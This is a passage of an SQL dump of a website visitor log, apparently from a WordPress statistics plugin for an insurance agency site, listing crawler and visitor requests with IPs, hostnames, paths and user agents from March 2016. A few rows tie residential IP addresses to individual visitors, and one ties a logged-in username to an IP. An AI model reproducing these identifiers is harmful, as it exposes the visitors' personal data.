12','','','','Unknown Spider','','','','3','0',0),(6954,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466129','94.23.40.23','crawl15.lp.007ac9.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6957,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466131','94.23.40.23','crawl15.lp.007ac9.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6959,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466134','94.23.40.23','crawl15.lp.007ac9.net','/?page_id=169','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6960,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466137','94.23.40.23','crawl15.lp.007ac9.net','/about-us/meet-the-eib-team/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6962,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466139','94.23.40.23','crawl15.lp.007ac9.net','/members/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6965,'0b_6823a7d9cc64bdde4088b5ef3312c05f','1458466142','94.23.40.23','crawl15.lp.007ac9.net','/meet-the-eib-team/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30','','',0,'Linux','Chrome 12','','','','Unknown Spider','','','','3','0',0),(6968,'0b_90407893c8d54be480125bbba0dce3c4','1458467561','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/SSO/235_19.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6971,'0b_4cdf2be8f42b0ae5fe60770a3c7a3fcd','1458469488','52.37.138.112','ec2-52-37-138-112.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6974,'0b_4cdf2be8f42b0ae5fe60770a3c7a3fcd','1458469488','52.37.138.112','ec2-52-37-138-112.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6975,'0b_4cdf2be8f42b0ae5fe60770a3c7a3fcd','1458469505','52.37.138.112','ec2-52-37-138-112.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6978,'0b_4cdf2be8f42b0ae5fe60770a3c7a3fcd','1458469555','52.37.138.112','ec2-52-37-138-112.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6981,'0b_4cdf2be8f42b0ae5fe60770a3c7a3fcd','1458469556','52.37.138.112','ec2-52-37-138-112.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6984,'0b_6e15bc89b15d59c8b58c7e9a24bfdc35','1458469818','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/forms/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(6986,'0b_86cd1d27483a58ff015cb9036dadf14d','1458473061','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6989,'0b_07cad99860adbed04473a1b3b81f053d','1458474091','52.26.254.114','ec2-52-26-254-114.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(6990,'0b_07cad99860adbed04473a1b3b81f053d','1458474109','52.26.254.114','ec2-52-26-254-114.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6993,'0b_07cad99860adbed04473a1b3b81f053d','1458474163','52.26.254.114','ec2-52-26-254-114.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6995,'0b_07cad99860adbed04473a1b3b81f053d','1458474164','52.26.254.114','ec2-52-26-254-114.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(6996,'0b_05d9acd53f3dd5a472a2a8b5f974bb6e','1458479184','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6999,'0b_ff28e1d969b3c1fbdcfaae9a76408abd','1458480378','68.180.229.91','b115355.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(7001,'0b_ff28e1d969b3c1fbdcfaae9a76408abd','1458480379','68.180.229.91','b115355.yse.yahoo.net','/licensing-contracting/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(7004,'0b_efb3aa203e044e3def875d1389141183','1458480853','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7005,'0b_645e75af501506131545b4eb4b370348','1458485418','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7008,'0b_06598e0a2026fb43f2e1bd5913d4a25d','1458486327','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7010,'0b_06598e0a2026fb43f2e1bd5913d4a25d','1458486330','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7011,'0b_06598e0a2026fb43f2e1bd5913d4a25d','1458486332','69.175.67.58','newscan04.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7014,'0b_06598e0a2026fb43f2e1bd5913d4a25d','1458486334','69.175.67.58','newscan04.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7016,'0b_06598e0a2026fb43f2e1bd5913d4a25d','1458486336','69.175.67.58','newscan04.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7017,'0b_06598e0a2026fb43f2e1bd5913d4a25d','1458486338','69.175.67.58','newscan04.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7020,'0b_06598e0a2026fb43f2e1bd5913d4a25d','1458486341','69.175.67.58','newscan04.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(7022,'0b_58562752482272187b8f7d2192fdef3c','1458490277','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(7023,'0b_58562752482272187b8f7d2192fdef3c','1458490280','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(7026,'0b_0d6fece5045590ecd3def9e9fe2b5256','1458493679','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(7028,'0b_305878e68195bdea53f2e849c246b2e8','1458495662','66.249.83.213,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(7029,'0b_70f7f55668f04e46b3ab9c96eb87ca1a','1458496265','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7031,'0b_45f600434d84c58345a0b629c80b5047','1458496562','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7034,'0b_ad5eaf20162801bde2074d3ae03f4342','1458499192','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/top.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7035,'0b_6853b94e58e846f42cfcb912628789fe','1458500134','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(7038,'0b_146e15cc84d3d1ae4818a0574a3d8bba','1458500906','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(7040,'0b_1dcba974a4a93b299f924de01ddb20cc','1458501943','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7041,'0b_1dcba974a4a93b299f924de01ddb20cc','1458501945','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7044,'0b_ba652f8e05d48947c88469c56715e083','1458502065','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7047,'0b_ba652f8e05d48947c88469c56715e083','1458502066','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7050,'0b_ba652f8e05d48947c88469c56715e083','1458502067','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7053,'0b_ba652f8e05d48947c88469c56715e083','1458502070','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7055,'0b_ba652f8e05d48947c88469c56715e083','1458502071','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/crafting-an-essay-9/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7058,'0b_ba652f8e05d48947c88469c56715e083','1458502072','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7061,'0b_ba652f8e05d48947c88469c56715e083','1458502072','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7064,'0b_c3f7750d6c7c6f09e42d51d96b264b74','1458502485','40.77.167.3','msnbot-40-77-167-3.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7067,'0b_c3f7750d6c7c6f09e42d51d96b264b74','1458502752','40.77.167.3','msnbot-40-77-167-3.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7070,'0b_c3f7750d6c7c6f09e42d51d96b264b74','1458502753','40.77.167.3','msnbot-40-77-167-3.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7071,'0b_c3f7750d6c7c6f09e42d51d96b264b74','1458502754','40.77.167.3','msnbot-40-77-167-3.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7073,'0b_c3f7750d6c7c6f09e42d51d96b264b74','1458502755','40.77.167.3','msnbot-40-77-167-3.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7074,'0b_c3f7750d6c7c6f09e42d51d96b264b74','1458502755','40.77.167.3','msnbot-40-77-167-3.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7077,'0b_88464b3bb8fe16ec854c39e7d06a7545','1458504287','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre','','',0,'Win7','Firefox 4','','','','','','','','0','0',0),(7079,'0b_e59a34ecfac3930a5816a8dcb2124b55','1458504384','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8','','',0,'Linux','Firefox 3','pl','','','','','','','0','0',0),(7080,'0b_f0217529d93238a3398bff64dbcf28ee','1458504804','66.249.83.217,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(7083,'0b_280542a0904ce1d757ae1b8387d0f2e5','1458509518','173.213.173.235','dwtt-05-1515.dsl.iowatelecom.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4','https://www.google.com/','_notprovided_',1,'iPhone OS','Safari 8 Mobile','us','','Google','','','','','0','0',0),(7085,'0b_280542a0904ce1d757ae1b8387d0f2e5','1458509533','173.213.173.235','dwtt-05-1515.dsl.iowatelecom.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','Safari 8 Mobile','us','','','','','','','0','0',0),(7086,'0b_a43bf93b0861d3f25a0e3812cd7b3207','1458511755','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(7089,'0b_a43bf93b0861d3f25a0e3812cd7b3207','1458511755','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7091,'0b_a43bf93b0861d3f25a0e3812cd7b3207','1458511755','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7094,'0b_a43bf93b0861d3f25a0e3812cd7b3207','1458511758','100.43.81.152','spider-100-43-81-152.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7097,'0b_9d437ac722630b9d2ac3c693c821b6fe','1458513348','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7098,'0b_8dd07a4e0f17e6cc328ec2a0f8fe67ea','1458513870','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7100,'0b_e3f92913446d624a744b44f77021d860','1458514044','66.249.73.169','crawl-66-249-73-169.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7103,'0b_e3f92913446d624a744b44f77021d860','1458514114','66.249.73.187','crawl-66-249-73-187.googlebot.com','/products.html','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(7106,'0b_9f21821f4792b229747d93777f9bdac1','1458514176','108.46.238.247','pool-108-46-238-247.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://r.search.yahoo.com/_ylt=A0LEVrb5KO9WRLwAs9YPxQt.;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1458542970/RO=10/RU=http%3a%2f%2fwww.empireins.com%2f/RK=0/RS=B9xg0QTfxz9pzKal8pyC07syewg-','_ylt=A0LEVrb5KO9WRLwAs9YPxQt.;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--',1,'Win10 x64','Firefox 45','us','1680 x 1050','Yahoo!','','','','','0','0',0),(7107,'0b_9f21821f4792b229747d93777f9bdac1','1458514178','108.46.238.247','pool-108-46-238-247.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1680 x 1050','','','','','','0','0',0),(7109,'0b_9f21821f4792b229747d93777f9bdac1','1458514187','108.46.238.247','pool-108-46-238-247.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1680 x 1050','','','','','','0','0',0),(7112,'0b_9f21821f4792b229747d93777f9bdac1','1458514270','108.46.238.247','pool-108-46-238-247.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/agent-tools/','',0,'Win10 x64','Firefox 45','us','1680 x 1050','','','','sadolf','','0','51',0),(7113,'0b_9f21821f4792b229747d93777f9bdac1','1458514541','108.46.238.247','pool-108-46-238-247.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://r.search.yahoo.com/_ylt=A0LEVrb5KO9WRLwAs9YPxQt.;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1458542970/RO=10/RU=http%3a%2f%2fwww.empireins.com%2f/RK=0/RS=B9xg0QTfxz9pzKal8pyC07syewg-','_ylt=A0LEVrb5KO9WRLwAs9YPxQt.;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--',1,'Win10 x64','Firefox 45','us','1680 x 1050','Yahoo!','','','sadolf','','0','51',0),(7116,'0b_9f21821f4792b229747d93777f9bdac1','1458514543','108.46.238.247','pool-108-46-238-247.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 45','us','1680 x 1050','','','','sadolf','','0','0',0),(7119,'0b_c341a8dbea6bfecf0bb481376ae7669c','1458515753','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(7122,'0b_53f6a85d4d802162922e2e3fcac5172a','1458516968','141.8.143.235','spider-141-8-143-235.yandex.com','/term-quotes/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7124,'0b_b44dc850db34af1861a5df4743b147a9','1458518709','180.76.15.137','baiduspider-180-76-15-137.crawl.baidu.com','/case-status/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(7125,'0b_7434c99ee46f5d7824188d265757d740','1458518810','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7127,'0b_c599b614b44bb53a3220b4c81f6d8178','1458519813','157.55.39.208','msnbot-157-55-39-208.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7130,'0b_c599b614b44bb53a3220b4c81f6d8178','1458519928','157.55.39.208','msnbot-157-55-39-208.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(7131,'0b_a8d95064db5fd7127224505e921f3cf4','1458520346','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7134,'0b_a8d95064db5fd7127224505e921f3cf4','1458520352','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7136,'0b_a8d95064db5fd7127224505e921f3cf4','1458520355','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/agent-tools/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7137,'0b_a8d95064db5fd7127224505e921f3cf4','1458520358','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/carriers/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7140,'0b_a8d95064db5fd7127224505e921f3cf4','1458520360','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/case-status/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7142,'0b_a8d95064db5fd7127224505e921f3cf4','1458520364','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7143,'0b_a8d95064db5fd7127224505e921f3cf4','1458520367','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/comments/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7145,'0b_a8d95064db5fd7127224505e921f3cf4','1458520369','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/contact/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7146,'0b_a8d95064db5fd7127224505e921f3cf4','1458520372','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7149,'0b_a8d95064db5fd7127224505e921f3cf4','1458520374','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/forms/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7151,'0b_a8d95064db5fd7127224505e921f3cf4','1458520379','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/home/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7154,'0b_a8d95064db5fd7127224505e921f3cf4','1458520381','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7155,'0b_a8d95064db5fd7127224505e921f3cf4','1458520384','92.149.126.120','abayonne-552-1-55-120.w92-149.abo.wanadoo.fr','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','fr','','','MJ12bot','','','','0','0',0),(7158,'0b_16e0942d6d455d314a4eb3e18ff80794','1458520977','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; 